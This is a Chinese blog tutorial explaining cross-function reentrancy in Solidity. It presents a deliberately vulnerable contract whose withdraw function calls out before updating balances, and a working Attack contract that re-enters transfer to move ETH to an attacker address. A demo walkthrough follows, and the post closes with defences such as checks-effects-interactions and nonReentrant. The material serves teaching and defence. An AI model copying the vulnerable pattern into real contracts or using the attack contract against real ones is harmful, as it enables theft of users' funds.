Solidity 智能合约安全漏洞——跨函数重入攻击

于 2024-08-19 11:35:53 发布
阅读量305 收藏 8
点赞数 14
文章标签: 智能合约 区块链
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69584919/article/details/141321312
版权

跨函数重入攻击

概述

跨函数重入攻击是更复杂的一种重入攻击方式,通常出现此问题的原因是多个函数相互共享同一状态变量,并且其中一些函数不安全地更新该变量。这种漏洞允许攻击者在一个函数执行期间通过另一个函数重新进入合约,操作尚未更新的状态数据。

漏洞示例

以下智能合约包含如下三个函数:deposit、 transfer和 withdraw,分别用于存储资产、转账以及提取资产,并使用 balances 这一状态变量来追踪用户余额。

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract Vulnerable {
    mapping (address => uint) public balances;

    function deposit() public payable {
        balances[msg.sender] = msg.value;
    }

    function transfer(address to, uint amount) public {
        if (balances[msg.sender] >= amount) {
            balances[to] += amount;
            balances[msg.sender] -= amount;
        }
    }

    function withdraw() public {
        uint amount = balances[msg.sender];
        (bool success, ) = msg.sender.call{value: amount}("");
        require(success);
        balances[msg.sender] = 0;
    }
}

漏洞分析:在 withdraw 函数中用户可以提取 ETH,通过 call 低代码调用转账给用户,此时执行流转移到用户合约。如果用户合约是一个恶意合约,它可以在默认的 receive 函数中再次调用 transfer 函数,并将资产转移到指定地址中(本节我们演示跨函数回调,因此调用 transfer 函数,而非 withdraw 函数)。

下面我们看下攻击合约是什么样的:

contract Attack {
    Vulnerable target;
    address hacker_addr = 0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2;
    uint amount;

    constructor(address _target) {
        target = Vulnerable(_target);
    }

    function attack() public payable {
        amount = msg.value;
        target.deposit{value: msg.value}();
        target.withdraw();
    }
    
    receive() external payable {
		    // 跨函数重入
        target.transfer(hacker_addr, amount);
    }
}

●attack 函数是个普通的函数,该函数接收 ETH 并调用 deposit 函数将资产存储到 Vulnerable 合约中,紧接着就调用 withdraw 函数提取出了资金,一切看起来是正常的。

●receive 函数在合约收到 ETH 资产时开始执行,这里它又重新发起了对 Vulnerable 合约中 transfer 函数的调用,将资产转移到指定地址 hacker_addr。

攻击演示

1.使用账户 Alice(0x5B3…dC4) 部署合约 Vulnerable,并调用 deposit 函数往合约中存入 10 ETH 的资产。

请添加图片描述
请添加图片描述

2.攻击者 Bob(0xAb8…cb2) 部署 Attack 合约,构造函数中传入上一个合约的地址。

请添加图片描述

3.攻击者 Bob(0xAb8…cb2) 调用 attack 函数,传入 1 ETH 发起攻击。

请添加图片描述

4.由于 Attack 合约存储了 1 ETH 后又立即取出,因此它的余额为 1 ETH,但是调用 Vulnerable 合约的 balances 函数会发现,攻击者 Bob(0xAb8…cb2) 的余额也为 1 ETH,凭空多了 1 ETH,而这多出来的资产正是 transfer 函数所转入的。通过重复操作或者修改存储金额,就可以把 Vulnerable 合约中的资产全部转移到 hacker_addr 地址中!

请添加图片描述

防范措施

为防止跨函数重入性攻击,推荐的做法是在进行所有关键状态更新之后再进行外部调用(上节讲解的 CEI 模式)。此外,使用像 OpenZeppelin 的nonReentrant修饰符也能有效防止此类问题,但是需要在多个函数上增加 nonReentrant 修饰符,以确保没有其他函数可以在当前函数执行完毕前重新进入该函数,它通过检查一个共享的存储值来判断函数是否已被调用。

结论

智能合约开发中防止重入攻击是一个重要的安全考虑。跨函数重入攻击展示了即使修复了单个函数的重入漏洞,也可能因多个函数共享状态而导致安全问题。因此,合约的设计与实现都应采取谨慎的编程实践,确保合约的安全性。

日照栏栅
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【ERC20安全审计】——19、重入攻击漏洞挖掘
Fly_鹏程万里
08-05 350
以太坊智能合约中的函数通过private、internal、public、external等修饰词来限定合约内函数的作用域(内部调用或外部调用),而我们将要介绍的重入漏洞就存在于合约之间的交互过程,常见的合约之间的交互其实也是很多的,例如:向未知逻辑的合约发送Ether,调用外部合约中的函数等,在以上交互过程看似没有什么问题,但潜在的风险点就是外部合约可以接管控制流从而可以实现对合约中不期望的数据进行修改,迫使其执行一些非预期的操作等。
Solidity 智能合约安全漏洞——普通重入攻击
最新发布
qq_69584919的博客
08-18 580
Solidity 智能合约安全漏洞——普通重入攻击
零时科技|solidity智能合约基础漏洞——重入漏洞
m0_37598434的博客
02-25 3832
区块链领域的安全问题不容忽视,这就要求开发者必须时刻小心谨慎,养成防御性编程思维
智能合约随想——一些简单的Solidity智能合约漏洞/攻击
weixin_73794026的博客
04-25 926
一个没啥干货的Solidity智能合约审计随想,外加一些杂七杂八的知识,大佬们轻点喷QAQ
零时科技|solidity智能合约基础漏洞——整数溢出漏洞
m0_37598434的博客
02-24 3988
黑客往往会利用溢出构造一个极小值/极大值,从而绕过某些检查,使巨额恶意转账得以成功。
智能合约安全之Solidity函数默认可见性漏洞
StevenX5
05-09 1662
Solidity 中,函数有可见性类型,指示函数被允许如何被调用。可见性决定了函数是否可以由用户、其他派生合约、仅在内部或外部调用。函数默认为公共的,即允许用户或合约从外部调用它们。不正确地使用函数可见性可能会导致智能合约中的一些破坏性漏洞。本文通过 Solidity 函数默认可见性漏洞原理的阐述,并结合智能合约实例代码的演示,介绍了一种函数默认可见性漏洞的原理及其解决方法。
欢迎来到Web3.0的世界:Solidity智能合约安全漏洞分析
文刀的博客天地
12-30 1457
Web3.0的世界里机遇和风险并存,智能合约工程师首要考虑的是潜在的安全问题,且看一行代码是如何让用户遭受巨额损失的。
智能合约安全——溢出漏洞
FingerNFT的博客
07-28 773
如果一个合约有溢出漏洞的话会导致计算的实际结果和预期的结果产生非常大的差异,这样轻则会影响合约的正常逻辑,重则会导致合约中的资金丢失。所以这个参数可以认为在攻击者的角度是不可用的。1.deposit函数存在两个运算操作,第一个是影响用户存入的余额balances的,这里传入的参数是可控的所以这里会有溢出的风险,另一个是影响用户的锁定时间lockTime的,但是这里的运算逻辑是每次调用deposit存入代币时会给lockTime增加一周,由于这里的参数不可控所以这个运算不会存在溢出风险。...
solidity 安全 合约的短地址攻击——这个锅谁来背
The future is already here it's just not evenly distributed。
09-25 1935
前一段时间,有个用户用说发交易的时候提示地址错误,后来发现发送的地址少了一字节;所以钱包检测发送地址时,会提示错误。当时也没当回事,以为是用户自己搞错了。最近研究solidity的时候,才明白了当时是怎么回事,原来这个用户遇到了短地址攻击。今天就来分析一下短地址攻击,玩ERC20的“韭菜们”都需要注意一下,否则你会发现,你的token被自己莫奇妙的都送给别人了,到时候可没地方说理去。 ...
2024solidity智能合约开发零基础精细化入门教程
05-09
Solidity语言受到了C++、Python和JavaScript等语言的影响,旨在提供一种安全、易于理解的方式来创建和管理智能合约。 特点 静态类型:Solidity是一种静态类型语言,这意味着所有变量的类型在编译时都必须明确指定。...
古老的Solidity智能合约错误代码编写
01-08
Solidity0.4.23版本的时候,有人在GitHub上列举了一些使用Solidity编写智能合约时常见的错误用法。虽然现在大家基本上都不会再写同样的问题代码,但是重新学习一下仍然有着借鉴意义。 1、tx.origin 错误用法:...
从头写一个solidity智能合约(三)代码实现
01-08
首先创建一个pet_token.sol文件,作为入口合约 pragma solidity ^0.4.4; import ./pet_factory.sol; import ./ecr712.sol; // PET 宠物 version - 1.0 contract PetToken is PetFactory, ERC721{ string public ...
基于FISCO BCOS 开发的solidity 智能合约DEMO
11-14
本DEMO主要展示了如何在FISCO BCOS上利用Solidity语言编写智能合约。下面我们将深入探讨FISCO BCOS、Solidity以及DEMO中包含的合约文件。 1. FISCO BCOS平台: FISCO BCOS是一个企业级的区块链基础设施,旨在提供...
IPFS、IPNS 网站部署
Willin Wang 的全栈升级指南
08-14 317
注意:如果没有你使用的框架,选择 Others,然后手动输入 build 命令(注意是要生成为静态站点~)。添加域名绑定并在 DNS 解析处增加 CNAME 别名解析。大部分情况下免费版本即可够用。
区块链+金融服务】供应链金融平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 309
四方精创基于 FISCO BCOS 设计了供应链金融平台,利用区块链多中心、不可篡改、不可抵赖、可追溯的特性, 在供应链生态企业间实现信用传递。
区块链+金融服务】企链通金融服务平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 276
深圳市企企通科技积极响应国家政策,为企业引入基于 FISCO BCOS 区块链技术的供应链金融服务。
区块链+金融服务】机构间对账平台 | FISCO BCOS应用案例
FISCO_BCOS的博客
08-15 210
机构间对账平台基于 FISCO BCOS 研发,将部分业务的资金信息和交易信息等作为副本旁路上链存储,用于微众银行与合作行的对账工作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值